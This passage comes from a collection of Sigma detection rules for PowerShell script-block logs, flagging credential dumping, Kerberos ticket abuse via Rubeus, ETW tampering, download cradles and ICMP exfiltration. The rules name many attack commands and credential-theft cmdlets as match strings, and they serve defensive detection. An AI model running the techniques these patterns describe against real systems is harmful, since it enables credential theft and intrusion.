    "content": "title: Potential In-Memory Execution Using Reflection.Assembly\nid: ddcd88cb-7f62-4ce5-86f9-1704190feb0a\nstatus: test\ndescription: Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50\nauthor: frack113\ndate: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1620\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enable\ndetection:\n    selection:\n        ScriptBlockText|contains: '[Reflection.Assembly]::load'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the library\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml",
    "content": "title: Potential COM Objects Download Cradles Usage - PS Script\nid: 3c7d1587-3b13-439f-9941-7d14313dbdfe\nrelated:\n    - id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf\n      type: similar\nstatus: test\ndescription: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57\nauthor: frack113\ndate: 2022-12-25\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enable\ndetection:\n    selection_1:\n        ScriptBlockText|contains: '[Type]::GetTypeFromCLSID('\n    selection_2:\n        ScriptBlockText|contains:\n            - '0002DF01-0000-0000-C000-000000000046'\n            - 'F6D90F16-9C73-11D3-B32E-00C04F990BB4'\n            - 'F5078F35-C551-11D3-89B9-0000F81FE221'\n            - '88d96a0a-f192-11d4-a65f-0040963251e5'\n            - 'AFBA6B42-5692-48EA-8141-DC517DCF0EF1'\n            - 'AFB40FFD-B609-40A3-9828-F88BBE11E4E3'\n            - '88d96a0b-f192-11d4-a65f-0040963251e5'\n            - '2087c2f4-2cef-4953-a8ab-66779b670495'\n            - '000209FF-0000-0000-C000-000000000046'\n            - '00024500-0000-0000-C000-000000000046'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_dsinternals_cmdlets.yml",
    "content": "title: DSInternals Suspicious PowerShell Cmdlets - ScriptBlock\nid: 846c7a87-8e14-4569-9d49-ecfd4276a01c\nrelated:\n    - id: 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e\n      type: similar\nstatus: test\ndescription: |\n    Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\n    The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\nreferences:\n    - https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-26\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Add-ADDBSidHistory'\n            - 'Add-ADNgcKey'\n            - 'Add-ADReplNgcKey'\n            - 'ConvertFrom-ADManagedPasswordBlob'\n            - 'ConvertFrom-GPPrefPassword'\n            - 'ConvertFrom-ManagedPasswordBlob'\n            - 'ConvertFrom-UnattendXmlPassword'\n            - 'ConvertFrom-UnicodePassword'\n            - 'ConvertTo-AADHash'\n            - 'ConvertTo-GPPrefPassword'\n            - 'ConvertTo-KerberosKey'\n            - 'ConvertTo-LMHash'\n            - 'ConvertTo-MsoPasswordHash'\n            - 'ConvertTo-NTHash'\n            - 'ConvertTo-OrgIdHash'\n            - 'ConvertTo-UnicodePassword'\n            - 'Disable-ADDBAccount'\n            - 'Enable-ADDBAccount'\n            - 'Get-ADDBAccount'\n            - 'Get-ADDBBackupKey'\n            - 'Get-ADDBDomainController'\n            - 'Get-ADDBGroupManagedServiceAccount'\n            - 'Get-ADDBKdsRootKey'\n            - 'Get-ADDBSchemaAttribute'\n            - 'Get-ADDBServiceAccount'\n            - 'Get-ADDefaultPasswordPolicy'\n            - 'Get-ADKeyCredential' # Covers 'Get-ADKeyCredentialLink'\n            - 'Get-ADPasswordPolicy'\n            - 'Get-ADReplAccount'\n            - 'Get-ADReplBackupKey'\n            - 'Get-ADReplicationAccount'\n            - 'Get-ADSIAccount'\n            - 'Get-AzureADUserEx'\n            - 'Get-BootKey'\n            - 'Get-KeyCredential'\n            - 'Get-LsaBackupKey'\n            - 'Get-LsaPolicy' # Covers 'Get-LsaPolicyInformation'\n            - 'Get-SamPasswordPolicy'\n            - 'Get-SysKey'\n            - 'Get-SystemKey'\n            - 'New-ADDBRestoreFromMediaScript'\n            - 'New-ADKeyCredential' # Covers 'New-ADKeyCredentialLink'\n            - 'New-ADNgcKey'\n            - 'New-NTHashSet'\n            - 'Remove-ADDBObject'\n            - 'Save-DPAPIBlob'\n            - 'Set-ADAccountPasswordHash'\n            - 'Set-ADDBAccountPassword' # Covers 'Set-ADDBAccountPasswordHash'\n            - 'Set-ADDBBootKey'\n            - 'Set-ADDBDomainController'\n            - 'Set-ADDBPrimaryGroup'\n            - 'Set-ADDBSysKey'\n            - 'Set-AzureADUserEx'\n            - 'Set-LsaPolicy' # Covers 'Set-LSAPolicyInformation'\n            - 'Set-SamAccountPasswordHash'\n            - 'Set-WinUserPasswordHash'\n            - 'Test-ADDBPasswordQuality'\n            - 'Test-ADPasswordQuality'\n            - 'Test-ADReplPasswordQuality'\n            - 'Test-PasswordQuality'\n            - 'Unlock-ADDBAccount'\n            - 'Write-ADNgcKey'\n            - 'Write-ADReplNgcKey'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of DSInternals for administration or audit purpose.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml",
    "content": "title: Dump Credentials from Windows Credential Manager With PowerShell\nid: 99c49d9c-34ea-45f7-84a7-4751ae6b2cbc\nstatus: test\ndescription: |\n    Adversaries may search for common password storage locations to obtain user credentials.\n    Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md\nauthor: frack113\ndate: 2021-12-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1555\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_kiddie:\n        ScriptBlockText|contains:\n            - 'Get-PasswordVaultCredentials'\n            - 'Get-CredManCreds'\n    selection_rename_Password:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - 'Windows.Security.Credentials.PasswordVault'\n    selection_rename_credman:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - 'Microsoft.CSharp.CSharpCodeProvider'\n            - '[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())'\n            - 'Collections.ArrayList'\n            - 'System.CodeDom.Compiler.CompilerParameters'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml",
    "content": "title: Enable Windows Remote Management\nid: 991a9744-f2f0-44f2-bd33-9092eba17dc3\nstatus: test\ndescription: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2\nauthor: frack113\ndate: 2022-01-07\ntags:\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains: 'Enable-PSRemoting '\n    condition: selection_cmdlet\nfalsepositives:\n    - Legitimate script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml",
    "content": "title: Potential Suspicious Windows Feature Enabled\nid: 55c925c1-7195-426b-a136-a9396800e29b\nrelated:\n    - id: c740d4cf-a1e9-41de-bb16-8a46a4f57918\n      type: similar\nstatus: test\ndescription: |\n    Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\n    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps\n    - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system\n    - https://learn.microsoft.com/en-us/windows/wsl/install-on-server\nauthor: frack113\ndate: 2022-09-10\nmodified: 2022-12-29\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - 'Enable-WindowsOptionalFeature'\n            - '-Online'\n            - '-FeatureName'\n    selection_feature:\n        # Add any insecure/unusual windows features to your env\n        ScriptBlockText|contains:\n            - 'TelnetServer'\n            - 'Internet-Explorer-Optional-amd64'\n            - 'TFTP'\n            - 'SMB1Protocol'\n            - 'Client-ProjFS'\n            - 'Microsoft-Windows-Subsystem-Linux'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the features listed in the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml",
    "content": "title: Enumerate Credentials from Windows Credential Manager With PowerShell\nid: 603c6630-5225-49c1-8047-26c964553e0e\nstatus: test\ndescription: |\n    Adversaries may search for common password storage locations to obtain user credentials.\n    Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md\nauthor: frack113\ndate: 2021-12-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1555\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - vaultcmd\n            - '/listcreds:'\n    selection_option:\n        ScriptBlockText|contains:\n            - 'Windows Credentials'\n            - 'Web Credentials'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml",
    "content": "title: Disable of ETW Trace - Powershell\nid: 115fdba9-f017-42e6-84cf-d5573bf2ddf8\nrelated:\n    - id: a238b5d0-ce2d-4414-a676-7a531b3d13d6\n      type: derived\nstatus: test\ndescription: Detects usage of powershell cmdlets to disable or remove ETW trace sessions\nreferences:\n    - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2022-11-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1562.006\n    - car.2016-04-002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_pwsh_remove:   # Autologger provider removal\n        ScriptBlockText|contains: 'Remove-EtwTraceProvider '\n    selection_pwsh_set:   # Provider “Enable” property modification\n        ScriptBlockText|contains|all:\n            - 'Set-EtwTraceProvider '\n            - '0x11'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml",
    "content": "title: Certificate Exported Via PowerShell - ScriptBlock\nid: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c\nrelated:\n    - id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb\n      type: similar\nstatus: test\ndescription: Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.\nreferences:\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a\n    - https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps\n    - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-04-23\nmodified: 2023-05-18\ntags:\n    - attack.credential-access\n    - attack.t1552.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Export-PfxCertificate'\n            - 'Export-Certificate'\n    filter_optional_module_export:\n        ScriptBlockText|contains: 'CmdletsToExport = @('\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate certificate exports by administrators. Additional filters might be required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml",
    "content": "title: Suspicious FromBase64String Usage On Gzip Archive - Ps Script\nid: df69cb1d-b891-4cd9-90c7-d617d90100ce\nrelated:\n    - id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f\n      type: similar\nstatus: test\ndescription: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43\nauthor: frack113\ndate: 2022-12-23\ntags:\n    - attack.command-and-control\n    - attack.t1132.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'FromBase64String'\n            - 'MemoryStream'\n            - 'H4sI'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml",
    "content": "title: Service Registry Permissions Weakness Check\nid: 95afc12e-3cbb-40c3-9340-84a032e596a3\nstatus: test\ndescription: |\n    Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\n    Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\n    Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4\nauthor: frack113\ndate: 2021-12-30\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.011\n    - stp.2a\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'get-acl'\n            - 'REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml",
    "content": "title: Active Directory Computers Enumeration With Get-AdComputer\nid: 36bed6b2-e9a0-4fff-beeb-413a92b86138\nstatus: test\ndescription: Detects usage of the \"Get-AdComputer\" to enumerate Computers or properties within Active Directory.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md\nauthor: frack113\ndate: 2022-03-17\nmodified: 2023-07-08\ntags:\n    - attack.discovery\n    - attack.t1018\n    - attack.t1087.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains: 'Get-AdComputer '\n    selection_option:\n        ScriptBlockText|contains:\n            - '-Filter '\n            - '-LDAPFilter '\n            - '-Properties '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml",
    "content": "title: Active Directory Group Enumeration With Get-AdGroup\nid: 8c3a6607-b7dc-4f0d-a646-ef38c00b76ee\nstatus: test\ndescription: Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md\nauthor: frack113\ndate: 2022-03-17\nmodified: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1069.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-AdGroup '\n            - '-Filter'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml",
    "content": "title: Suspicious Get-ADReplAccount\nid: 060c3ef1-fd0a-4091-bf46-e7d625f60b73\nstatus: test\ndescription: |\n    The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\n    These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\nreferences:\n    - https://www.powershellgallery.com/packages/DSInternals\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount\nauthor: frack113\ndate: 2022-02-06\ntags:\n    - attack.credential-access\n    - attack.t1003.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Get-ADReplAccount\n            - '-All '\n            - '-Server '\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml",
    "content": "title: Automated Collection Bookmarks Using Get-ChildItem PowerShell\nid: e0565f5d-d420-4e02-8a68-ac00d864f9cf\nstatus: test\ndescription: |\n    Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\n    Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\n    internal network resources such as servers, tools/dashboards, or other related infrastructure.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md\nauthor: frack113\ndate: 2021-12-13\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1217\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-ChildItem'\n            - ' -Recurse '\n            - ' -Path '\n            - ' -Filter Bookmarks'\n            - ' -ErrorAction SilentlyContinue'\n            - ' -Force'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml",
    "content": "title: Security Software Discovery Via Powershell Script\nid: 904e8e61-8edf-4350-b59c-b905fc8e810c\nstatus: test\ndescription: |\n    Detects calls to \"get-process\" where the output is piped to a \"where-object\" filter to search for security solution processes.\n    Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell\nauthor: frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-16\nmodified: 2023-10-24\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'get-process | \\?'\n            - 'get-process | where'\n            - 'gps | \\?'\n            - 'gps | where'\n    selection_field:\n        ScriptBlockText|contains:\n            - 'Company -like'\n            - 'Description -like'\n            - 'Name -like'\n            - 'Path -like'\n            - 'Product -like'\n    selection_keywords:\n        ScriptBlockText|contains:\n            # Note: These strings are using wildcard assuming the search is using the \"-like\" operator.\n            #       You can add specific variant with the actual process names to increase coverage\n            - '\\*avira\\*'\n            - '\\*carbonblack\\*'\n            - '\\*cylance\\*'\n            - '\\*defender\\*'\n            - '\\*kaspersky\\*'\n            - '\\*malware\\*'\n            - '\\*sentinel\\*'\n            - '\\*symantec\\*'\n            - '\\*virus\\*'\n    condition: all of selection_*\nfalsepositives:\n    - False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required.\n    - As the \"selection_cmdlet\" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml",
    "content": "title: HackTool - Rubeus Execution - ScriptBlock\nid: 3245cd30-e015-40ff-a31d-5cadd5f377ec\nrelated:\n    - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18\n      type: similar\nstatus: test\ndescription: Detects the execution of the hacktool Rubeus using specific command line flags\nreferences:\n    - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus\n    - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html\n    - https://github.com/GhostPack/Rubeus\nauthor: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2023-04-27\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1558.003\n    - attack.lateral-movement\n    - attack.t1550.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'asreproast '\n            - 'dump /service:krbtgt '\n            - 'dump /luid:0x'\n            - 'kerberoast '\n            - 'createnetonly /program:'\n            - 'ptt /ticket:'\n            - '/impersonateuser:'\n            - 'renew /ticket:'\n            - 'asktgt /user:'\n            - 'harvest /interval:'\n            - 's4u /user:'\n            - 's4u /ticket:'\n            - 'hash /password:'\n            - 'golden /aes256:'\n            - 'silver /user:'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml",
    "content": "title: HackTool - WinPwn Execution - ScriptBlock\nid: 851fd622-b675-4d26-b803-14bc7baa517a\nrelated:\n    - id: d557dc06-62e8-4468-a8e8-7984124908ce\n      type: similar\nstatus: test\ndescription: |\n    Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-12-04\nreferences:\n    - https://github.com/S3cur3Th1sSh1t/WinPwn\n    - https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841\n    - https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/\n    - https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md\n    - https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1046\n    - attack.t1082\n    - attack.t1106\n    - attack.t1518\n    - attack.t1548.002\n    - attack.t1552.001\n    - attack.t1555\n    - attack.t1555.003\nlogsource:\n    category: ps_script\n    product: windows\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Offline_Winpwn'\n            - 'WinPwn '\n            - 'WinPwn.exe'\n            - 'WinPwn.ps1'\n    condition: selection\nfalsepositives:\n    - As the script block is a blob of text. False positive may occur with scripts that contain the keyword as a reference or simply use it for detection.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml",
    "content": "title: PowerShell Hotfix Enumeration\nid: f5d1def8-1de0-4a0e-9794-1f6f27dd605c\nstatus: test\ndescription: Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers\nreferences:\n    - https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-21\ntags:\n    - attack.discovery\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Win32_QuickFixEngineering'\n            - 'HotFixID'\n    condition: selection\nfalsepositives:\n    - Legitimate administration scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml",
    "content": "title: PowerShell ICMP Exfiltration\nid: 4c4af3cd-2115-479c-8193-6b8bfce9001c\nstatus: test\ndescription: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp\nauthor: 'Bartlomiej Czyz @bczyz1, oscd.community'\ndate: 2020-10-10\nmodified: 2022-12-25\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - 'System.Net.NetworkInformation.Ping'\n            - '.Send('\n    condition: selection\nfalsepositives:\n    - Legitimate usage of System.Net.NetworkInformation.Ping class\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml",
    "content": "title: Import PowerShell Modules From Suspicious Directories\nid: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab\nrelated:\n    - id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3\n      type: similar\nstatus: test\ndescription: Detects powershell scripts that import modules from suspicious directories\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-07\nmodified: 2023-01-10\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Import-Module \"$Env:Temp\\'\n            - Import-Module '$Env:Temp\\\n            - 'Import-Module $Env:Temp\\'\n            - 'Import-Module \"$Env:Appdata\\'\n            - Import-Module '$Env:Appdata\\\n            - 'Import-Module $Env:Appdata\\'\n            - 'Import-Module C:\\Users\\Public\\'\n            # Import-Module alias is \"ipmo\"\n            - 'ipmo \"$Env:Temp\\'\n            - ipmo '$Env:Temp\\\n            - 'ipmo $Env:Temp\\'\n            - 'ipmo \"$Env:Appdata\\'\n            - ipmo '$Env:Appdata\\\n            - 'ipmo $Env:Appdata\\'\n            - 'ipmo C:\\Users\\Public\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml",
    "content": "title: Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript\nid: 975b2262-9a49-439d-92a6-0709cccdf0b2\nrelated:\n    - id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a\n      type: similar\n    - id: 9a025188-6f2d-42f8-bb2f-d3a83d24a5af\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages\nreferences:\n    - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package\n    - https://twitter.com/WindowsDocs/status/1620078135080325122\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-31\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enable\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'Add-AppPackage '\n            - 'Add-AppxPackage '\n    selection_flag:\n        ScriptBlockText|contains: ' -AllowUnsigned'\n    condition: all of 